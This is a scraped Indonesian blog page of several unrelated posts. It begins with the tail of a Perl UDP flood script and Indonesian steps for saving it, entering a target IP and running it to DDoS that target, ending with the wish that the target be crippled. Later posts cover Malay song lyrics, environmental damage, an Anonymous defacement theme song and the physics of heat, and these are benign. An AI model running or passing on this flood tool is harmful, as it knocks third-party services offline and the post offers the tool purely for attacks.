      send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94wRAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumuswaraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwXfjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73uGIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHYZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"), 0, pack_sockaddr_in($pport, $iaddr));

   
      print ("$ip:$pport packet size: $psize\n");
 }


Cara Membuat Perl untuk DDOS :
  1. Copy semua kode diatas kedalam notepad.
  2. Simpan, lalu pilih Save as type dengan All Files. dan File Name nya menjadi berakhiran .pl . Contoh ddos.pl

Catatan :
Tulisan IP Target diganti dengan IP yang ingin sobat DDOS

Cara Penggunaan Perl DDOS :
  1. Download dan Install Active Perl diatas
  2. Klik dua kali file yang sudah kita buat dari notepad
  3. Maka Tools akan otomatis attack target yang ingin di DDOS

Sekian mengenai Contoh Script Perl Untuk DDOS semoga targetnya lumpuh.
wisonirgmailcom DDOS, Hack

Lirik Lagu Melayu Hang Tuah

Download Lirik Lagu Hang Tuah - Lirik Lagu Melayu Hang Tuah - Lagu Melayu Hang Tuah mp3 - Lagu Hang Tuah merupakan lagu berirama Langgam. Kumpulan Lagu Berirama Langgam contohnya Sri Mersing, Tudung Periuk, Bahtera Merdeka, Fatwa Pujangga dan termasuk Lagu Hang Tuah.
Video dibawah ini Lagu Hang Tuah dinyanyikan oleh Theja Fathasena.


Dang Merdu bunda berjasa ,
Melahirkan putra perkasa
Hangtuah laksmana satria
Teladan negri dan bangsa

Dari Bintan kepulauan Riau
Dan baktimu kesegenap rantau
Walau kini kau telah tiada
Fatwa mu tiada kan sirna

** Tlah sakti hamba negeri
Esa hilang dua terbilang
Patang tumbuh hilang kan berganti
Takkan melayu hilang dibumi
Engkau susun jari sepuluh
Menghatur sembah
Duduk bersimpuh
Hangsudi rilsalah melayu
Hangtuah hooooo Hangtuah

Semoga Lirik Lagu Melayu Hang Tuah dapat bermanfaat.
wisonirgmailcom Lagu, Lirik, Melayu

Bentuk Kerusakan Lingkungan Hidup Berdasarkan Faktor Penyebabnya

Bentuk Kerusakan Lingkungan Hidup dan Faktor Penyebabnya - Kerusakan Lingkungan Hidup tidak lepas dari Faktor Penyebab Kerusakan lingkungan tersebut. Lingkungan adalah segala sesuatu yang ada di sekitar manusia yang memengaruhi perkembangan kehidupan manusia baik langsung maupun tidak langsung. Lingkungan Hidup adalah kesatuan ruang dengan semua benda dan kesatuan makhluk hidup termasuk di dalamnya manusia dan perilakunya yang melangsungkan perikehidupan dan kesejahteraan manusia serta makhluk hidup lainnya.

Ini adalah Poster mengenai Bentuk Kerusakan Lingkungan Hidup Berdasarkan Faktor Penyebabnya yang saya buat :

Poster Lingkungan Hidup, Contoh Poster Lingkungan Hidup


Berdasarkan faktor penyebabnya, bentuk kerusakan lingkungan hidup dibedakan menjadi 2 jenis, yaitu:

1. Bentuk Kerusakan Lingkungan Hidup Akibat Peristiwa Alam
a. Letusan gunung berapi
Letusan gunung berapi terjadi karena aktivitas magma di perut bumi yang menimbulkan tekanan kuat keluar melalui puncak gunung berapi.Bahaya yang ditimbulkan oleh letusan gunung berapi antara lain berupa:
  • Hujan abu vulkanik, menyebabkan gangguan pernafasan.
  • Lava panas, merusak, dan mematikan apa pun yang dilalui.
  • Awan panas, dapat mematikan makhluk hidup yang dilalui.
  • Gas yang mengandung racun.
  • Material padat (batuan, kerikil, pasir), dapat menimpa perumahan, dan lain-lain.

b. Gempa bumi
Gempa bumi adalah getaran kulit bumi yang bisa disebabkan karena beberapa hal, di antaranya kegiatan magma (aktivitas gunung berapi), terjadinya tanah turun, maupun karena gerakan lempeng di dasar samudra. Manusia dapat mengukur berapa intensitas gempa, namun manusia sama sekali tidak dapat memprediksikan kapan terjadinya gempa.

Oleh karena itu, bahaya yang ditimbulkan oleh gempa lebih dahsyat dibandingkan dengan letusan gunung berapi. Pada saat gempa berlangsung terjadi beberapa peristiwa sebagai akibat langsung maupun tidak langsung, di antaranya:
  • Berbagai bangunan roboh.
  • Tanah di permukaan bumi merekah, jalan menjadi putus.
  • Tanah longsor akibat guncangan.
  • Terjadi banjir, akibat rusaknya tanggul.
  • Gempa yang terjadi di dasar laut dapat menyebabkan tsunami (gelombang pasang).

c. Angin topan
Angin topan terjadi akibat aliran udara dari kawasan yang bertekanan tinggi menuju ke kawasan bertekanan rendah.

Perbedaan tekanan udara ini terjadi karena perbedaan suhu udara yang mencolok. Serangan angin topan bagi negara-negara di kawasan Samudra Pasifik dan Atlantik merupakan hal yang biasa terjadi. Bagi wilayah-wilayah di kawasan California, Texas, sampai di kawasan Asia seperti Korea dan Taiwan, bahaya angin topan merupakan bencana musiman. Tetapi bagi Indonesia baru dirasakan di pertengahan tahun 2007. Hal ini menunjukkan bahwa telah terjadi perubahan iklim di Indonesia yang tak lain disebabkan oleh adanya gejala pemanasan global.

Bahaya angin topan bisa diprediksi melalui foto satelit yang menggambarkan keadaan atmosfer bumi, termasuk gambar terbentuknya angin topan, arah, dan kecepatannya. Serangan angin topan (puting beliung) dapat menimbulkan kerusakan lingkungan hidup dalam bentuk:
  • Merobohkan bangunan.
  • Rusaknya areal pertanian dan perkebunan.
  • Membahayakan penerbangan.
  • Menimbulkan ombak besar yang dapat menenggelamkan kapal.

2. Kerusakan Lingkungan Hidup karena Faktor Manusia
Manusia sebagai penguasa lingkungan hidup di bumi berperan besar dalam menentukan kelestarian lingkungan hidup. Manusia sebagai makhluk ciptaan Tuhan yang berakal budi mampu merubah wajah dunia dari pola kehidupan sederhana sampai ke bentuk kehidupan modern seperti sekarang ini.

Namun sayang, seringkali apa yang dilakukan manusia tidak diimbangi dengan pemikiran akan masa depan kehidupan generasi berikutnya. Banyak kemajuan yang diraih oleh manusia membawa dampak buruk terhadap kelangsungan lingkungan hidup.

Beberapa bentuk kerusakan lingkungan hidup karena faktor manusia, antara lain:
  • Terjadinya pencemaran (pencemaran udara, air, tanah, dan suara) sebagai dampak adanya kawasan industri.
  • Terjadinya banjir, sebagai dampak buruknya drainase atau sistem pembuangan air dan kesalahan dalam menjaga daerah aliran sungai dan dampak pengrusakan hutan.

Sekian mengenai artikel Bentuk Kerusakan Lingkungan Hidup Berdasarkan Faktor Penyebabnya. Semoga artikel ini dapat memberi informasi yang sangat akurat.
wisonirgmailcom Lingkungan Hidup, Pendidikan

Download Lagu Intro Origent Anonymous

Lagu Anonymous yang berjudul Intro Origent ini sudah banyak yang kenal. Setiap deface anggota dari Hacker Anonymous pasti menggunakan sound Intro Origent sebagai lagu dari hasil deface. Untuk yang ingin memasang lagu di Blog, dapat menggunakan Cara Memasang Lagu Auto Play di Blog.

Lagu Anonymous, Soundtrack Intro Origent

https://www.4shared.com/mp3/cjLVc-9Q/Anonymous_Intro_Origent.html
Size : 1,662 KB

Baca juga mengenai Deface, pada artikel sebelumnya yang berjudul Website Divisi Hukum Polri di Deface.
wisonirgmailcom Hack

Download Lagu Sepekan di Tanjungpinang

Download Musik Sepekan di Tanjungpinang - Download Lagu Melayu Sepekan di Tanjungpinang - Sebelumnya saya sudah memposting Lirik Lagu Melayu Sepekan di Tanjungpinang. Kali ini saya akan membahas mengenai Lagu Sepekan di Tanjungpinang. Lagu yang dinyanyikan Zaleha Hamid ini sudah sangat terkenal. Dulu pernah tahun sebelum-sebelumnya Artis yang bernama Titiek Puspa menyanyikan Lagu Sepekan di Tanjungpinang. Lagu tersebut ia nyanyikan pada saat ia berada di Tanjungpinang sedang menghadiri acara.

https://www.4shared.com/mp3/h2vZW7Eg/Zaleha_Hamid_-_Sepekan_di_Tanj.html
File : 2,638 KB

Jika anda ingin mendengar suara dari Titik Puspa kami akan share videonya :


Semoga lagu tersebut dapat anda download dan dapat di dengar.
wisonirgmailcom Lagu

Arti Kalor Dalam Fisika

Pengertian Kalor Dalam Fisika - Kalor merupakan salah satu bentuk energi, dengan satuan joule atau kalori

  • 1 Joule = 0,24 Kalori
  • 1 Kalori = 4,2 Joule

  • Kalor Jenis
Kalor Jenis adalah banyaknya kalor yang diperlukan untuk menaikkan suhu 1 Kg zat sebesar 1 derajat.

Ilustrasi Rumus Kalor Jenis
  • Kapasitas Kalor
Kapasitas Kalor adalah banyaknya kalor yang diperlukan untuk menaikkan/menurunkan suhu suatu zat sebesar 1 derajat.

Ilustrasi Rumus Kapasitas Kalor

Pengaruh Kalor Pada Suatu Benda :
  1. Terjadinya Kenaikan Suhu
  2. Terjadinya Pemuaian
  3. Terjadinya Perubahan Wujud

Perubahan Wujud
Akibat dari pemberikan kalor pada benda menyebabkan terjadinya perubahan wujud seperti :
  • Cari menjadi Padat = Membeku
  • Cair Menjadi Gas = menguap
  • Padat Menjadi Cair = Mencair
  • Pada Menjadi Gas = Menyublim
  • Gas Menjadi Padat = Deposisi
  • Gas Menjadi Cair = Mengembun

Untuk mengubah wujud suatu benda diperlukan kalor yang besarnya ditentukan oleh massa benda tersebut

Misalnya : Untuk mengubah es menjadi air dibutuhkan kalor yang dinamakan dengan Kalor Lebur

Besar Kalor Lebur :

Besar Kalor Lebur

Semoga Artikel yang berjudul "Arti Kalor Dalam Fisika" ini dapat membantu teman-teman dalam menyelesaikan tugasnya.
wisonirgmailcom Fisika, Pendidikan